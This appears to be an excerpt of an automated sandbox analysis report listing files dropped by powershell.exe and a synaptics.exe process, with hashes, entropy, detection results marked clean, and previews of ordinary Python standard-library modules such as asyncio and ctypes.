                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Event loop using a selector and related classes.....A selector is a "notify-when-ready" multiplexer. For a subclass which..also includes support for signal handling, see the unix_events sub-module..."""....__all__ = 'BaseSelectorEventLoop',....import collections..import errno..import functools..import selectors..import socket..import warnings..import weakref..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import base_events..from . import constants..from . import events..from . import futures..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _test_selector_event(selector, fd, event):.. # Test if the selector is monitoring 'event' events.. # for the file descriptor 'fd'... try:.. key = selector.get_key(fd).. except KeyError:.. return False.. else:.. return bool(key.events & event)......class BaseSelectorEventLoop(base_events.Ba
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28198
                                                                                                                                                                                                            Entropy (8bit):4.380247560157575
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:NN1WZLkAX1OsB3Vh56rU9rGDb6xptzTczd:NN1+LkAX8yH56A9rGP6xpezd
                                                                                                                                                                                                            MD5:83C63D7561CD2414C87A3FA114D44D6A
                                                                                                                                                                                                            SHA1:CB107CEE232D294C9E2F6DD80B902AEA474718DA
                                                                                                                                                                                                            SHA-256:3306824E191D5CDFEF1AFD43ECBA18A83071B9DAA1F78C6EB26AAB4AB9048895
                                                                                                                                                                                                            SHA-512:7359184376609C7D70796150072DC467B5968AEBE8C8ECB68F6AF1C5E3363F40207596EED707B41E12174C7D821F4DC0E17748416837F538FDFDED73B86B55C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import collections..import warnings..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import constants..from . import protocols..from . import transports..from .log import logger......def _create_transport_context(server_side, server_hostname):.. if server_side:.. raise ValueError('Server side SSL needs a valid SSLContext').... # Client side may pass ssl=True to use a default.. # context; in that case the sslcontext passed is None... # The default is secure for client connections... # Python 3.4+: use up-to-date strong settings... sslcontext = ssl.create_default_context().. if not server_hostname:.. sslcontext.check_hostname = False.. return sslcontext......# States of an _SSLPipe..._UNWRAPPED = "UNWRAPPED".._DO_HANDSHAKE = "DO_HANDSHAKE".._WRAPPED = "WRAPPED".._SHUTDOWN = "SHUTDOWN"......class _SSLPipe(object):.. """An SSL "Pipe"..... An SSL pipe allows you to communicate with an SSL/TLS protocol instan
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6141
                                                                                                                                                                                                            Entropy (8bit):4.389643633306416
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r/40VDFh1NO3QFFBUQJxAHsI/5QGG/1a4bN4u8MGomMMhetgqldcEtHCF3hUkwTB:dV1BEBQjaQWKtldcEyxUkwt
                                                                                                                                                                                                            MD5:BCA378D3DB917FB79E03181E278C23AD
                                                                                                                                                                                                            SHA1:EF2CD76DD08000173CA5EDA494DB4F728066BBDC
                                                                                                                                                                                                            SHA-256:18785BF43A6B21A235DA704A60CAF28232F6E57C56E3EB81D01BB50C5B9D4858
                                                                                                                                                                                                            SHA-512:CCB0F5C3EB272A4404E467FB5789A7D32D686794530BFAD1A07FFA934D9B497368ABC5569BB97D0BB323BB78A8E74CC413768CB6D8619FCE3E8D2A49FB695008
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Support for running coroutines in parallel with staggered start times."""....__all__ = 'staggered_race',....import contextlib..import typing....from . import events..from . import exceptions as exceptions_mod..from . import locks..from . import tasks......async def staggered_race(.. coro_fns: typing.Iterable[typing.Callable[[], typing.Awaitable]],.. delay: typing.Optional[float],.. *,.. loop: events.AbstractEventLoop = None,..) -> typing.Tuple[.. typing.Any,.. typing.Optional[int],.. typing.List[typing.Optional[Exception]]..]:.. """Run coroutines with staggered start times and take the first to finish..... This method takes an iterable of coroutine functions. The first one is.. started immediately. From then on, whenever the immediately preceding one.. fails (raises an exception), or when *delay* seconds has passed, the next.. coroutine is started. This continues until one of the coroutines complete.. successfully, in which case
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26475
                                                                                                                                                                                                            Entropy (8bit):4.351304207072744
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:xqOmlvrA3xYWOmAjvZ7ugVv//iUhu0UDYCHkJhqhXWFNTiHMn:xq11AmWOTLZb/PhvJhyXkTisn
                                                                                                                                                                                                            MD5:56965E2C05DF1F1DAC105502D1686BBE
                                                                                                                                                                                                            SHA1:53779633F7A5A8DB4268D0386550CC79BD63BA68
                                                                                                                                                                                                            SHA-256:781B7C62457CD50B939333B475F3B4FB5325F67B517495FEA71C401DD58E883B
                                                                                                                                                                                                            SHA-512:3D67C518806C846A66A91EDAF4E6585C6552A16E19F386ED4384688D3B19F78A3018F0CE780124EAF035DA439C15FF93AE51F97ACF707C71A9A0784ED994D209
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:__all__ = (.. 'StreamReader', 'StreamWriter', 'StreamReaderProtocol',.. 'open_connection', 'start_server')....import collections..import socket..import sys..import warnings..import weakref....if hasattr(socket, 'AF_UNIX'):.. __all__ += ('open_unix_connection', 'start_unix_server')....from . import coroutines..from . import events..from . import exceptions..from . import format_helpers..from . import protocols..from .log import logger..from .tasks import sleep......_DEFAULT_LIMIT = 2 ** 16 # 64 KiB......async def open_connection(host=None, port=None, *,.. limit=_DEFAULT_LIMIT, **kwds):.. """A wrapper for create_connection() returning a (reader, writer) pair..... The reader returned is a StreamReader instance; the writer is a.. StreamWriter instance..... The arguments are all the usual arguments to create_connection().. except protocol_factory; most common are positional host and port,.. with various optional keyword arguments followin
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7628
                                                                                                                                                                                                            Entropy (8bit):4.229024687026487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:K4sU1b4rU9oQesQ+rshTeThT/xPNGMcfOytq8UgHS0Nym0NQC+3LtgL63LGgLv:x6J3OJ/Ls/tly9mBCa5yOCyv
                                                                                                                                                                                                            MD5:367664768E545C482B86256F2818E026
                                                                                                                                                                                                            SHA1:066EB1FCA5F99E9B98993DBD52113823611B82AF
                                                                                                                                                                                                            SHA-256:A511D0D64D2D8086B7CB8E81DBBB0D906FA12D8731DA52F20FF198F44BDF415A
                                                                                                                                                                                                            SHA-512:7D24AE851D72239B20EC3B8B5F24A289A8C08D304D7FE1162EA835C7E14216B69B5D9BE12C2BD159CDD84B08706DA513D9F4F4DF8497387C79B9585108B0C128
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:__all__ = 'create_subprocess_exec', 'create_subprocess_shell'....import subprocess....from . import events..from . import protocols..from . import streams..from . import tasks..from .log import logger......PIPE = subprocess.PIPE..STDOUT = subprocess.STDOUT..DEVNULL = subprocess.DEVNULL......class SubprocessStreamProtocol(streams.FlowControlMixin,.. protocols.SubprocessProtocol):.. """Like StreamReaderProtocol, but for a subprocess.""".... def __init__(self, limit, loop):.. super().__init__(loop=loop).. self._limit = limit.. self.stdin = self.stdout = self.stderr = None.. self._transport = None.. self._process_exited = False.. self._pipe_fds = [].. self._stdin_closed = self._loop.create_future().... def __repr__(self):.. info = [self.__class__.__name__].. if self.stdin is not None:.. info.append(f'stdin={self.stdin!r}').. if self.stdout is not None:.. info.a
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33404
                                                                                                                                                                                                            Entropy (8bit):4.3943534683176075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:c5sqn6CXKC861FefeiMmhnRkdIqww1jAJ9n9hifDR745CwZ1:Isqfo0jAJ9n9hirRk5Cwf
                                                                                                                                                                                                            MD5:E0A388F341C48E78AB295C321EFF9478
                                                                                                                                                                                                            SHA1:4D16B510E48165D2C217607EFCD8897D2BC81024
                                                                                                                                                                                                            SHA-256:5F79D86734D4D9EC631942A2BF6F167E959B75C6BD8AACAECDD0C4AF947134F0
                                                                                                                                                                                                            SHA-512:1443FE48D4249E8415279CBB8822E8DFE6C9379404DC401AA031F9B64B3B1784E8B1B857A37623FA8901F07D395F642B7AEA3A0E10F45120F4B6C8E5C4FC8C83
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Support for tasks, coroutines and the scheduler."""....__all__ = (.. 'Task', 'create_task',.. 'FIRST_COMPLETED', 'FIRST_EXCEPTION', 'ALL_COMPLETED',.. 'wait', 'wait_for', 'as_completed', 'sleep',.. 'gather', 'shield', 'ensure_future', 'run_coroutine_threadsafe',.. 'current_task', 'all_tasks',.. '_register_task', '_unregister_task', '_enter_task', '_leave_task',..)....import concurrent.futures..import contextvars..import functools..import inspect..import itertools..import types..import warnings..import weakref..from types import GenericAlias....from . import base_tasks..from . import coroutines..from . import events..from . import exceptions..from . import futures..from .coroutines import _is_coroutine....# Helper to generate new task names..# This uses itertools.count() instead of a "+= 1" operation because the latter..# is not thread safe. See bpo-11866 for a longer explanation..._task_name_counter = itertools.count(1).__next__......def current_task(loop=None):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):815
                                                                                                                                                                                                            Entropy (8bit):4.657768265178285
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:gpnQoNsLJHhQITtNaCiXm9PjkqjYcKTm3I3CGxu:gpnQoNwN7aFW9hj3CmYyG0
                                                                                                                                                                                                            MD5:0EBB52B3B39916EDEE1B1CE2805F0D5E
                                                                                                                                                                                                            SHA1:11600DD141A2A22C00F5A7E0A43F5916778E53AA
                                                                                                                                                                                                            SHA-256:60310C6E008F10C117388BA34811250134DC6FE4577031CDA37E8F9ADEA40920
                                                                                                                                                                                                            SHA-512:E8DF889521C85F7B2A3AB5DD21F3B3B87B3A254B289D7E80B9256A73B0204D19149FC92E5433CCFD3201223D03CEDAA45F56C8E9FD58E51FCAA0820079604188
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""High-level support for working with threads in asyncio"""....import functools..import contextvars....from . import events......__all__ = "to_thread",......async def to_thread(func, /, *args, **kwargs):.. """Asynchronously run function *func* in a separate thread..... Any *args and **kwargs supplied for this function are directly passed.. to *func*. Also, the current :class:`contextvars.Context` is propagated,.. allowing context variables from the main thread to be accessed in the.. separate thread..... Return a coroutine that can be awaited to get the eventual result of *func*... """.. loop = events.get_running_loop().. ctx = contextvars.copy_context().. func_call = functools.partial(ctx.run, func, *args, **kwargs).. return await loop.run_in_executor(None, func_call)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11059
                                                                                                                                                                                                            Entropy (8bit):4.482698697012134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9OHQeRHshZCLgUWipf9vcmS13ACrCN7ZMNUDlM1kw0dgmw/vuKwAHdtEZF/S19Vw:936TgUf8TUS0dKHqF/SD/3r9ZG
                                                                                                                                                                                                            MD5:96A130EE6ADF30E96D9308E19344B2FA
                                                                                                                                                                                                            SHA1:4BED1D98A2DB119C78B359A3CC016296087F18B4
                                                                                                                                                                                                            SHA-256:0818D9F904F815561B7F22D675ADA970B37F4ADAE81114E4A5417F42D0C9F4F9
                                                                                                                                                                                                            SHA-512:7BF2287BA1BC710692FC43ADFBF92770353D835ED6991854FA97F875003CFA5D4C704502108252EBFDFC5E8E247C56CC8437B5968706804341923A8F57620066
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Abstract Transport class."""....__all__ = (.. 'BaseTransport', 'ReadTransport', 'WriteTransport',.. 'Transport', 'DatagramTransport', 'SubprocessTransport',..)......class BaseTransport:.. """Base class for transports.""".... __slots__ = ('_extra',).... def __init__(self, extra=None):.. if extra is None:.. extra = {}.. self._extra = extra.... def get_extra_info(self, name, default=None):.. """Get optional transport information.""".. return self._extra.get(name, default).... def is_closing(self):.. """Return True if the transport is closing or closed.""".. raise NotImplementedError.... def close(self):.. """Close the transport..... Buffered data will be flushed asynchronously. No more data.. will be received. After all buffered data is flushed, the.. protocol's connection_lost() method will (eventually) be.. called with None as its argument... """.. raise Not
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6082
                                                                                                                                                                                                            Entropy (8bit):4.500320848600473
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:I5/Igxl+C3xyyqoR8VM3aKxpOSPwI/0ClpFC7:I2gN3Ou8Qa
                                                                                                                                                                                                            MD5:E481F8A3FC8B4A8395BBF44DA6585FCB
                                                                                                                                                                                                            SHA1:98CDA58FD9102CFA1D001BE6B7E1B0F1674E6AD7
                                                                                                                                                                                                            SHA-256:408B28A6A11A88349E80FDC20BCD0F633323D4DCF347A38BAA5A5CE6D42AD297
                                                                                                                                                                                                            SHA-512:A67B4F69250DC4650BB875DDF817BEB674886DCC32DF37E2BF92E0349507E3049F7F14E5420F3E2EBB41305E7ED4B8955DDBAA61DA102B3EB197520AC2EFDDF1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import socket..import warnings......class TransportSocket:.... """A socket-like wrapper for exposing real transport sockets..... These objects can be safely returned by APIs like.. `transport.get_extra_info('socket')`. All potentially disruptive.. operations (like "socket.close()") are banned... """.... __slots__ = ('_sock',).... def __init__(self, sock: socket.socket):.. self._sock = sock.... def _na(self, what):.. warnings.warn(.. f"Using {what} on sockets returned from get_extra_info('socket') ".. f"will be prohibited in asyncio 3.9. Please report your use case ".. f"to bugs.python.org.",.. DeprecationWarning, source=self).... @property.. def family(self):.. return self._sock.family.... @property.. def type(self):.. return self._sock.type.... @property.. def proto(self):.. return self._sock.proto.... def __repr__(self):.. s = (.. f"<asyncio.T
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53090
                                                                                                                                                                                                            Entropy (8bit):4.324144807672143
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vSYjWziU+axtl5XbohsIztcA8Z3uOYtTUcW0KNcWe8SJJ1NoJbf:vSYjV/OcscW4J6
                                                                                                                                                                                                            MD5:91630C1DEA6BFD146284BB885AB8CEC1
                                                                                                                                                                                                            SHA1:DB24D8F7E86992F230A09292F92A09698CEDAFB6
                                                                                                                                                                                                            SHA-256:1B709F48D4DE03A64B5019292DB4EA46AA2429E437F0620BEE3A27DE4A59F235
                                                                                                                                                                                                            SHA-512:AB5D265D2DF2F9585A673C794AE1BDC51B1BCC6AA56CBE0BBB8AE6BC1030D25D806E60408054EC5ECABBF96D8F8CFA387BFE20C7D4479790C9B92CED1819FF28
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Selector event loop for Unix with signal handling."""....import errno..import io..import itertools..import os..import selectors..import signal..import socket..import stat..import subprocess..import sys..import threading..import warnings....from . import base_events..from . import base_subprocess..from . import constants..from . import coroutines..from . import events..from . import exceptions..from . import futures..from . import selector_events..from . import tasks..from . import transports..from .log import logger......__all__ = (.. 'SelectorEventLoop',.. 'AbstractChildWatcher', 'SafeChildWatcher',.. 'FastChildWatcher', 'PidfdChildWatcher',.. 'MultiLoopChildWatcher', 'ThreadedChildWatcher',.. 'DefaultEventLoopPolicy',..)......if sys.platform == 'win32': # pragma: no cover.. raise ImportError('Signals are not really supported on Windows')......def _sighandler_noop(signum, frame):.. """Dummy signal handler.""".. pass......def waitstatus_to_exitcode(status):.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):34318
                                                                                                                                                                                                            Entropy (8bit):4.394385476178189
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YSklSE8iWvPeLAZqzDKwLZg8CaDUKggaKSCsiWs/TZ:YSklwyzDTg8CaDU9gaKIiWsd
                                                                                                                                                                                                            MD5:5EA598DF93474895BD1F5CA2A2061BF2
                                                                                                                                                                                                            SHA1:1DA5C2FC88485877377DA18EB7CF1343AC9BFF62
                                                                                                                                                                                                            SHA-256:B0F5FE9761D2269B112CF2D69A195D016CD15D68D735721A2631BFBE45992862
                                                                                                                                                                                                            SHA-512:01BD2EE8171F941198A6A03A6A53062FE8637FE38E6E22E76C0CC604ED89AE7F2AC9E9920A2391427C542B3EDAF1DFB1C6F03BBF661F21A6DC61BA394F0AC351
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Selector and proactor event loops for Windows."""....import sys....if sys.platform != 'win32': # pragma: no cover.. raise ImportError('win32 only')....import _overlapped..import _winapi..import errno..import math..import msvcrt..import socket..import struct..import time..import weakref....from . import events..from . import base_subprocess..from . import futures..from . import exceptions..from . import proactor_events..from . import selector_events..from . import tasks..from . import windows_utils..from .log import logger......__all__ = (.. 'SelectorEventLoop', 'ProactorEventLoop', 'IocpProactor',.. 'DefaultEventLoopPolicy', 'WindowsSelectorEventLoopPolicy',.. 'WindowsProactorEventLoopPolicy',..)......NULL = 0..INFINITE = 0xffffffff..ERROR_CONNECTION_REFUSED = 1225..ERROR_CONNECTION_ABORTED = 1236....# Initial delay in seconds for connect_pipe() before retrying to connect..CONNECT_PIPE_INIT_DELAY = 0.001....# Maximum delay in seconds for connect_pipe() before retrying t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5233
                                                                                                                                                                                                            Entropy (8bit):4.66851270735605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:boTZtyajYlxYEsofyCFdVhXpdGepIpLbpxYaVXwW/W6CGIa8HR5Kw7ygKwabPKwP:boF8aElNfyUpHbO5LQWQ3H6w7yBwASwP
                                                                                                                                                                                                            MD5:3D2450646C295F667F04535CB6511EE9
                                                                                                                                                                                                            SHA1:25FF829B27063DA4032110F82531A3657DDEA61A
                                                                                                                                                                                                            SHA-256:23FF6C7FECECFE35A06EAF7615C1E1E67C0740B78CA75A04C548B184BE87B958
                                                                                                                                                                                                            SHA-512:76763286932FA7B2105DEC85F82A34B14A55FC747BDEED12DCC78F5D779CCBB4BC05D81E13316E3C65C6E34772B8995A2D66AC0DE59B8F29F51E54DEE4734457
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Various Windows specific bits and pieces."""....import sys....if sys.platform != 'win32': # pragma: no cover.. raise ImportError('win32 only')....import _winapi..import itertools..import msvcrt..import os..import subprocess..import tempfile..import warnings......__all__ = 'pipe', 'Popen', 'PIPE', 'PipeHandle'......# Constants/globals......BUFSIZE = 8192..PIPE = subprocess.PIPE..STDOUT = subprocess.STDOUT.._mmap_counter = itertools.count()......# Replacement for os.pipe() using handles instead of fds......def pipe(*, duplex=False, overlapped=(True, True), bufsize=BUFSIZE):.. """Like os.pipe() but with overlapped support and using handles not fds.""".. address = tempfile.mktemp(.. prefix=r'\\.\pipe\python-pipe-{:d}-{:d}-'.format(.. os.getpid(), next(_mmap_counter))).... if duplex:.. openmode = _winapi.PIPE_ACCESS_DUPLEX.. access = _winapi.GENERIC_READ | _winapi.GENERIC_WRITE.. obsize, ibsize = bufsize, bufsize.. else:.. ope
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48477
                                                                                                                                                                                                            Entropy (8bit):5.122489611728904
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:YbNUurnFDpytMbeGzDRBPou+eQyWImBfbGm49WxxSNo4Q+M2PvUPPAeOTMtJcCnM:CNtFDpyTGzDRBPoJImBfbGm49WxENbQ8
                                                                                                                                                                                                            MD5:8FD7C73CF7A2806714EBB340666B3669
                                                                                                                                                                                                            SHA1:2B340D8C9ED15252561791C3101FC2E7368F8F10
                                                                                                                                                                                                            SHA-256:E6B67631C802547C00F607CF9FCEB133178CFA9ECD0984CA804640AB7A2A369C
                                                                                                                                                                                                            SHA-512:69EF0FD49B454818711017C270568B5D8E259510F9C42AA33CB0EDA9BB95E5AE8FF86AB5BA5FDC03FFDB8E7C8B45E24B841CB56B9B39D2C10812881380EDE1AB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):262
                                                                                                                                                                                                            Entropy (8bit):4.869245191962833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/C/0eC5VvkFZlaE+MdF/Hj5J+ruwkn23h/axtGdgIun:CC/0eC7gj+Er+NfsbGdcn
                                                                                                                                                                                                            MD5:0370562593AF7C0A36EC1365C698F80A
                                                                                                                                                                                                            SHA1:674373F58DC2F59260E6CDA2F59B2DFEF38D1E98
                                                                                                                                                                                                            SHA-256:F0D14C5E36A8299F8027BFDA0337962F2C7BF12E627DA6E548D95276918AB447
                                                                                                                                                                                                            SHA-512:56D9B36325821ABD0CA18BE3B293F0EBB392B1750ACDF5393796C6A9C90FD87EF77706F23870E4729E4BC6CDAC2E3E33AA1CD9CA15020047BE344DADE8458625
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGenericAliasN)..._collections_abcr....r......r....r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18551
                                                                                                                                                                                                            Entropy (8bit):4.911777403573548
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:5UnNLtfcCpgqgGiYYIgH+MKIPpEVege6pGXtSNynb8055rev9RiRJX+CUgvDWYH:IgqgkgHTK/eg5055re7oh+qvDWYH
                                                                                                                                                                                                            MD5:4011BD449ADC4F81A3C2471D506F013D
                                                                                                                                                                                                            SHA1:917020BD87DB0A002CD9FE3A018BCF235B7F4748
                                                                                                                                                                                                            SHA-256:554DCFD54E9D080FB9157BED5323C74F2709982B1E5B64896B85164A0B983F57
                                                                                                                                                                                                            SHA-512:B04272D4BB930A11C80BB78992DFB7D7B0A9DABF665179FD56EE9E168116B3D999EC18C513626BDF23F23DCC5A581A4499FB67A43D6823D911FBF4B78AC854BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""create and manipulate C data types in Python"""....import os as _os, sys as _sys..import types as _types....__version__ = "1.1.0"....from _ctypes import Union, Structure, Array..from _ctypes import _Pointer..from _ctypes import CFuncPtr as _CFuncPtr..from _ctypes import __version__ as _ctypes_version..from _ctypes import RTLD_LOCAL, RTLD_GLOBAL..from _ctypes import ArgumentError....from struct import calcsize as _calcsize....if __version__ != _ctypes_version:.. raise Exception("Version number mismatch", __version__, _ctypes_version)....if _os.name == "nt":.. from _ctypes import FormatError....DEFAULT_MODE = RTLD_LOCAL..if _os.name == "posix" and _sys.platform == "darwin":.. # On OS X 10.3, we use RTLD_GLOBAL as default mode.. # because RTLD_LOCAL does not work at least on some.. # libraries. OS X 10.3 is Darwin 7, so we check for.. # that..... if int(_os.uname().release.split('.')[0]) < 8:.. DEFAULT_MODE = RTLD_GLOBAL....from _ctypes import FUNCFLAG_CDEC
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15932
                                                                                                                                                                                                            Entropy (8bit):5.337077320948506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:uoMRQLVaCuvN1r9u1uZJpCDV7exkqxo5IbeXrEoV:uoMoVg9u1Ug75pIbQwoV
                                                                                                                                                                                                            MD5:DF6213132F4C98BEEBE463823ED81BE6
                                                                                                                                                                                                            SHA1:86A16BEFCE65300234AA49E3AB1BEEC0A89FB2C9
                                                                                                                                                                                                            SHA-256:32598DD704E4146242CC501A653DF3FF18880A48E1A8FB02CE2B3D22A30DC37E
                                                                                                                                                                                                            SHA-512:2761EFE658B5132B0BF40AB8823B51A09B4F248B5A326D0E74BA7DC79F36793B7A450098459F7759FDDDA5E99528162502FB0BDF42378344995DB4FD5662A84E
                                                                                                                                                                                                            Malicious:false
